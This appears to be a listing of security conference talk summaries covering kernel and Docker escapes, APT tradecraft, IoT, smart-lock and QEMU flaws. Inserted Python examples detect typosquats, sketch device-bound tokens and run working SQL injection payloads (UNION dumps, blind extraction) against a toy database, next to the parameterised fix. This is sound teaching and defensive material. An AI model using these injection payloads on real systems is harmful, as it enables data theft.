This document discusses techniques for hooking and tracing program execution without a debugger. It introduces EhTrace, a tool that drives branch stepping of a binary with hardware exceptions: it sets the CPU's debug flags so that the target process raises a single-step exception at each branch, then handles that exception in-process to record the branch. Because the target can clear those flags or change page protections and take control back, the talk covers "blockfighting" techniques, such as page-protection tricks, for keeping control during analysis. Coverage data such as flame graphs can be generated from the trace to visualize control flow. Future work includes tighter symbol support and additional blockfighters that monitor CPU flags and page protections.
This document summarizes a presentation about the evolution of advanced persistent threat (APT) actors and their operations security (OPSEC). It discusses how Mandiant's 2013 disclosure of APT1 significantly disrupted that group's operations and pushed actors to adapt their techniques. Over time, actors have incorporated more off-the-shelf tools, constrained their operations according to the target, and improved OPSEC in response to earlier reports. The presentation also outlines a simplified attacker engagement process and argues that defenders should respond by demanding more actionable information in APT reports.
Hardsploit is a framework and hardware device that allows security researchers to audit and pentest hardware devices like IoT systems. It functions as a bridge between hardware interfaces and software testing tools. The framework includes a programmable hardware board with 64 I/O channels that can communicate over various protocols to analyze components, dump memory, and exploit vulnerabilities found in hardware. The goal of Hardsploit is to advance the field of hardware security testing and evaluation.
The document discusses crash-resistance in software and how it can be exploited. It explains how Windows handles exceptions raised inside certain callback functions: the fault is swallowed and the program keeps running instead of terminating. This crash-resistance property is demonstrated with a simple example program. The document then shows how crash-resistant memory probing defeats defenses like ASLR: a web worker scans the process address space and, because a faulting read no longer kills the browser, learns which addresses are mapped. Heap spraying and type confusion are used to craft fake objects and drive the scan, recovering information such as the TEB and DLL base addresses.
This document summarizes Docker escape techniques. It begins with an overview of Docker and how it uses namespaces and control groups (cgroups) for isolation. It then discusses the risks posed by untrusted images and by escaping namespaces to reach the host or other containers. The main part describes the escape technique itself: obtain a handle to the process's task structure, reset its namespace proxy to the initial (host) namespace, and gain root on the host either by exploiting a kernel vulnerability or by overwriting the task's credentials. Example code is provided that switches the task's filesystem structure and namespace proxy to leave the container.
This document discusses techniques for abusing the Intel paging mechanism on Windows to achieve arbitrary write capabilities despite modern kernel protections. It describes how the HAL's heap can be accessed from user mode by modifying page table entries, allowing kernel pointers to be leaked. It also explains how spraying process memory with fake page directories can cause physical memory exhaustion and potentially lead to arbitrary writes if a sprayed page is mapped. Live demos are promised for Windows and Linux attacks.
CSW2016 D. Antoine: Automatic Exploit Generation (CanSecWest)
The document discusses automated exploit generation through program analysis techniques. It introduces dynamic binary instrumentation, symbolic execution, and concolic execution as program analysis methods that can help automate finding the path to a vulnerability and generating an exploit. It provides examples of how these techniques work and of common tools such as Pin, KLEE and angr. The document concludes by discussing challenges such as defining the semantics of vulnerabilities precisely, and the potential of program analysis to find more bugs through techniques like automated proofs of program correctness.
The document summarizes research into hacking the Kwikset Kevo smart lock using a Bluetooth-enabled smartphone. The researcher was able to bind their phone to the Kevo fob and unlock the smart lock while the owner was asleep, taking advantage of the fob's brief window of continued radio transmission after it has been bound to another device. Potential fixes discussed include adding a button to the fob, using broadcast rather than point-to-point Bluetooth mode, or requiring authentication through a smartphone app instead of the standalone fob. A demo video of the attack is referenced.
This document summarizes a presentation given by three security researchers from Tencent KEEN Security Lab at CanSecWest 2016 about compromising Apple graphics. They discuss fuzzing Apple's graphics drivers to find vulnerabilities by targeting interfaces that are reachable from the Safari sandbox. As a case study, they describe a race condition vulnerability they discovered in AppleIntelBDWGraphics that could lead to a double free and kernel code execution on macOS systems with Intel Broadwell graphics. They provide tips for making fuzzing more effective, such as targeting less restricted interfaces and leveraging relationships between different graphics interfaces and objects.
Harri Hursti gave a presentation on security issues with electronic voting machines in the US. He discussed how independent security reviews of voting machines ended in 2007 and have not been conducted since, despite 52 models being used in the 2016 election. He provided examples of machines having network connections contrary to claims, such as a machine that transmitted results via modem. Hursti argued that more independent review of current voting machine security is needed given the issues uncovered in past research and real election incidents.
CSW2017 Kyle Ehmke: Lots of Squats - APTs Never Miss Leg Day (CanSecWest)
The document discusses how threat actors often register spoofed domains to target organizations, and how analyzing domain registration patterns can provide both strategic and tactical threat intelligence. It gives examples of analyzing spoofed domains targeting healthcare organizations to identify trends, and of pivoting from domains used in attacks to find other domains associated with the same actors. Analysis of registration trends and WHOIS data for spoofed domains helps organizations monitor for potential threats and gain situational awareness during incidents.
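The two steps the talk describes, flagging look-alike registrations of a brand and then pivoting on shared WHOIS attributes, as an added example in Python. This is not code from the talk; the registration feed, the WHOIS extracts, the brand `examplehealth` and the confusable table are all constructed for illustration.

```python
"""Flag spoofed registrations of a brand in a domain feed, then pivot on WHOIS."""
from typing import Dict, List, Optional, Set, Tuple

# One-character confusables an attacker commonly substitutes (sample table, not exhaustive).
HOMOGLYPHS: Dict[str, List[str]] = {
    "l": ["1", "i"], "i": ["l", "1"], "o": ["0"], "e": ["3"],
    "a": ["4"], "s": ["5"], "m": ["rn"], "w": ["vv"],
}

# Constructed "newly registered domains" feed, as a defender might pull from a daily zone diff.
NEW_REGISTRATIONS = [
    "examplehealth.com",          # the organisation's own domain
    "example-health.com",
    "examplehealth-portal.com",
    "examp1ehealth.com",
    "exarnplehealth.com",
    "exampleheath.com",
    "examplehealth.co",
    "examplehealth-secure.net",
    "unrelatedclinic.org",
]

# Constructed WHOIS extracts for the pivot step (registrant e-mail and one nameserver).
WHOIS: Dict[str, Dict[str, str]] = {
    "examp1ehealth.com":        {"registrant_email": "reg-a@mail.invalid", "nameserver": "ns1.cheaphost.invalid"},
    "exarnplehealth.com":       {"registrant_email": "reg-a@mail.invalid", "nameserver": "ns9.elsewhere.invalid"},
    "examplehealth-secure.net": {"registrant_email": "reg-b@mail.invalid", "nameserver": "ns1.cheaphost.invalid"},
    "unrelatedclinic.org":      {"registrant_email": "reg-c@mail.invalid", "nameserver": "ns2.bighost.invalid"},
}


def homoglyph_variants(label: str) -> Set[str]:
    """Every label obtained by replacing exactly one character with a confusable."""
    out: Set[str] = set()
    for idx, ch in enumerate(label):
        for sub in HOMOGLYPHS.get(ch, []):
            out.add(label[:idx] + sub + label[idx + 1:])
    return out


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (insert / delete / substitute) by the classic row-by-row DP."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(domain: str) -> str:
    """Second-level label, e.g. 'examplehealth' for 'examplehealth.co'.
    Assumption: single-label TLDs; a production tool would consult the Public Suffix List."""
    parts = domain.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def classify(domain: str, brand: str, legitimate: Set[str]) -> Optional[str]:
    """Reason a registration looks like a spoof of `brand`, or None if it does not."""
    if domain.lower() in legitimate:
        return None
    label = registrable_label(domain)
    if label == brand:
        return "brand on another TLD"
    if label.replace("-", "") == brand:
        return "hyphenated brand"
    if label in homoglyph_variants(brand):
        return "homoglyph"
    if edit_distance(label, brand) <= 1:
        return "typo"
    if brand in label.replace("-", ""):
        return "brand with affix"
    return None


def find_spoofs(feed: List[str], brand: str, legitimate: Set[str]) -> List[Tuple[str, str]]:
    """All (domain, reason) pairs in the feed that match the brand, in feed order."""
    hits = []
    for domain in feed:
        reason = classify(domain, brand, legitimate)
        if reason:
            hits.append((domain, reason))
    return hits


def pivot_on_whois(seed: str, whois: Dict[str, Dict[str, str]],
                   fields: Tuple[str, ...] = ("registrant_email", "nameserver")) -> Dict[str, List[str]]:
    """Other domains that share any of `fields` with the seed domain's WHOIS record."""
    seed_rec = whois.get(seed, {})
    linked: Dict[str, List[str]] = {}
    for domain, rec in whois.items():
        if domain == seed:
            continue
        shared = [f for f in fields if f in seed_rec and rec.get(f) == seed_rec[f]]
        if shared:
            linked[domain] = shared
    return linked


if __name__ == "__main__":
    for hit in find_spoofs(NEW_REGISTRATIONS, "examplehealth", {"examplehealth.com"}):
        print(hit)
    print(pivot_on_whois("examp1ehealth.com", WHOIS))
```

Shared registrant e-mail is a strong link, a shared nameserver at a bulk host is a weak one; the pivot reports which field matched so an analyst can weight the result rather than treating every link equally.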
This document discusses cryptography and capture-the-flag (CTF) games. It includes Python code samples for encrypting and decrypting messages, poses questions about cryptographic techniques, and challenges the reader to solve sample ciphertexts and encryption problems.
This document provides an overview of common web vulnerabilities and techniques for exploiting them using DVWA (Damn Vulnerable Web Application), a deliberately vulnerable web application. It covers the vulnerabilities at DVWA's "low" security level: brute force, command injection, CSRF, file inclusion and SQL injection. It then goes into more detail on SQL injection: string concatenation of user input into the query, error-based detection, UNION queries, and retrieving data from other tables. It also covers blind SQL injection, file upload, and both reflected and stored cross-site scripting. The document is an introduction to using DVWA to learn web application hacking.
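The SQL injection techniques listed above (concatenation, error-based column counting, UNION extraction and boolean blind extraction) run against a DVWA-style lookup, beside the parameterised fix, as an added example. This is not DVWA's own code: it uses an in-memory SQLite database whose tables and rows are constructed here, and the admin hash is simply md5 of "password".

```python
"""Union, error-based and blind SQL injection against a DVWA-style lookup, plus the fix."""
import sqlite3
from typing import List, Set, Tuple

ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"   # md5("password"); constructed sample data


def build_db() -> sqlite3.Connection:
    """Two constructed tables: the one the page queries and the one the attacker wants."""
    con = sqlite3.connect(":memory:")
    con.executescript(f"""
        CREATE TABLE users(user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT);
        CREATE TABLE credentials(user TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', 'admin'), (2, 'Gordon', 'Brown'), (3, 'Hack', 'Me');
        INSERT INTO credentials VALUES ('admin', '{ADMIN_HASH}'),
                                       ('gordonb', 'e99a18c428cb38d5f260853678922e03');
    """)
    return con


def lookup_vulnerable(con: sqlite3.Connection, user_id: str) -> List[Tuple[str, str]]:
    """DVWA 'low' style: the request parameter is concatenated straight into the SQL."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(query).fetchall()


def lookup_safe(con: sqlite3.Connection, user_id: str) -> List[Tuple[str, str]]:
    """Parameterised fix: the value travels separately from the statement, so quotes are data."""
    return con.execute("SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)).fetchall()


def count_columns(con: sqlite3.Connection, max_cols: int = 10) -> int:
    """Error-based probe: ORDER BY n raises once n exceeds the SELECT's column count."""
    found = 0
    for n in range(1, max_cols + 1):
        try:
            lookup_vulnerable(con, f"x' ORDER BY {n} -- ")
        except sqlite3.OperationalError:
            break
        found = n
    return found


def union_dump(con: sqlite3.Connection) -> Set[Tuple[str, str]]:
    """With the column count known, a UNION pulls rows out of a different table."""
    return set(lookup_vulnerable(con, "x' UNION SELECT user, password_hash FROM credentials -- "))


def blind_extract(con: sqlite3.Connection, target_sql: str,
                  alphabet: str = "0123456789abcdef", max_len: int = 64) -> str:
    """Boolean-based blind: one character per round, judged only by whether row 1 comes back."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = f"1' AND substr(({target_sql}), {pos}, 1) = '{ch}' -- "
            if lookup_vulnerable(con, payload):
                recovered += ch
                break
        else:
            break   # no candidate matched: the target string has ended
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("tautology:", lookup_vulnerable(db, "1' OR '1'='1"))
    print("columns:", count_columns(db))
    print("union:", union_dump(db))
    print("blind:", blind_extract(db, "SELECT password_hash FROM credentials WHERE user = 'admin'"))
    print("fixed:", lookup_safe(db, "1' OR '1'='1"))
```

The blind extraction costs up to one request per candidate character per position, which is why real tooling binary-searches on character codes instead; the loop here is kept linear so the oracle is easy to read.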
This document discusses various aspects of securing Android development, including permissions, encryption, API management, and more, and addresses protecting USB, the screen, the clipboard and local databases. It recommends implementing cryptography in native code via the Android NDK to make reverse engineering harder. API access should use randomly generated access tokens that are bound to the user ID and a hardware ID and refreshed periodically. Encryption keys should be derived from a random value, the hardware ID and a user-provided secret.
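The two recommendations above, device-bound tokens that are refreshed periodically and keys derived from random, hardware-ID and user-supplied inputs, as an added example. It is written in plain Python rather than the Android Java or Kotlin the page targets, so that it runs stand-alone; the server key, hardware ID, user ID and passphrase are constructed values, and the `|`-separated token layout is this example's own choice, not the page's.

```python
"""Device-bound API tokens with expiry, and key derivation from random + hardware ID + passphrase."""
import hashlib
import hmac
import secrets
import time
from typing import Optional


def derive_key(user_passphrase: str, hardware_id: str, salt: bytes, iterations: int = 200_000) -> bytes:
    """PBKDF2-HMAC-SHA256. The random salt and the hardware ID form the salt input; the
    passphrase is the secret. A hardware ID is readable by other apps, so it binds the key
    to the device but must not be relied on for entropy; that comes from salt + passphrase."""
    return hashlib.pbkdf2_hmac("sha256", user_passphrase.encode(), salt + hardware_id.encode(),
                               iterations, dklen=32)


def issue_token(server_key: bytes, user_id: str, hardware_id: str, ttl_seconds: int,
                now: Optional[int] = None) -> str:
    """Random nonce + user ID + hardware ID + expiry, authenticated with an HMAC tag.
    Assumption: user_id and hardware_id never contain the '|' separator."""
    issued = int(time.time()) if now is None else now
    nonce = secrets.token_hex(16)
    body = f"{nonce}|{user_id}|{hardware_id}|{issued + ttl_seconds}"
    tag = hmac.new(server_key, body.encode(), "sha256").hexdigest()
    return f"{body}|{tag}"


def verify_token(server_key: bytes, token: str, user_id: str, hardware_id: str,
                 now: Optional[int] = None) -> bool:
    """Valid only if the tag checks out AND the token was issued to this user on this device
    AND it has not expired. The tag is compared in constant time."""
    try:
        nonce, uid, hwid, expiry, tag = token.split("|")
    except ValueError:
        return False
    body = f"{nonce}|{uid}|{hwid}|{expiry}"
    expected = hmac.new(server_key, body.encode(), "sha256").hexdigest()
    if not hmac.compare_digest(expected, tag):
        return False
    current = int(time.time()) if now is None else now
    return uid == user_id and hwid == hardware_id and current < int(expiry)


def refresh_token(server_key: bytes, old_token: str, user_id: str, hardware_id: str,
                  ttl_seconds: int, now: Optional[int] = None) -> Optional[str]:
    """Periodic refresh: a still-valid token for this user/device is exchanged for a fresh one;
    an expired or foreign token gets nothing and the client must re-authenticate."""
    if not verify_token(server_key, old_token, user_id, hardware_id, now):
        return None
    return issue_token(server_key, user_id, hardware_id, ttl_seconds, now)


if __name__ == "__main__":
    key = secrets.token_bytes(32)
    tok = issue_token(key, "user-42", "hw-abc123", ttl_seconds=300)
    print(tok)
    print("same device:", verify_token(key, tok, "user-42", "hw-abc123"))
    print("other device:", verify_token(key, tok, "user-42", "hw-zzz999"))
    print(derive_key("correct horse", "hw-abc123", secrets.token_bytes(16)).hex())
```

The token is useless if replayed from another device because the hardware ID is inside the authenticated body, and a server-side revocation list keyed on the nonce is all that is needed to kill a token before its expiry.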
Android uses the Binder IPC mechanism for communication between processes. Binder implements remote procedure calls over a client-server model; transactions are synchronous by default, with one-way (asynchronous) transactions also supported. It works by passing flat binder objects between processes through the binder driver in the kernel. Key aspects of Android IPC include Intents for asynchronous messaging, AIDL for defining synchronous RPC interfaces across processes, and system services that register themselves with the service manager.
CSW2017 Qiang Li, Zhibin Hu, Mei Wang: Dig into QEMU Security (CanSecWest)
The document summarizes a presentation on analyzing the security of QEMU. It introduces QEMU and describes its main attack surfaces, including device emulation, virtio, third-party libraries, VNC, Spice, and QMP. Examples of vulnerabilities found in Cirrus VGA, virtio filesystem, virglrenderer library, VNC, and QMP are provided. The document concludes with thoughts on efficient security analysis, noting that combining in-depth knowledge with fuzzing is most effective for finding bugs in complex software like QEMU.
The document discusses cybersecurity issues in IoT devices. It begins with the 2016 Mirai botnet attacks, which exploited weak credentials and vulnerabilities in IoT devices such as IP cameras and DVRs to take major websites offline. It then analyzes the current state of IoT security, finding that many devices ship with vulnerabilities because manufacturers do not prioritize security. It also notes that IoT devices could be used as "weapons of mass destruction" given their ubiquity, connectivity and access to users' daily lives. The rest of the document examines common vulnerabilities and attack vectors in IoT devices.
The document discusses exploiting a vulnerability in Cisco ASA firewall devices. It begins with background on the target device and vulnerability, then outlines steps for getting access to the firmware, debugging the target, and identifying the vulnerability through static and dynamic analysis. The document then covers techniques for triggering the vulnerability and developing a controlled exploit to achieve remote code execution without user interaction.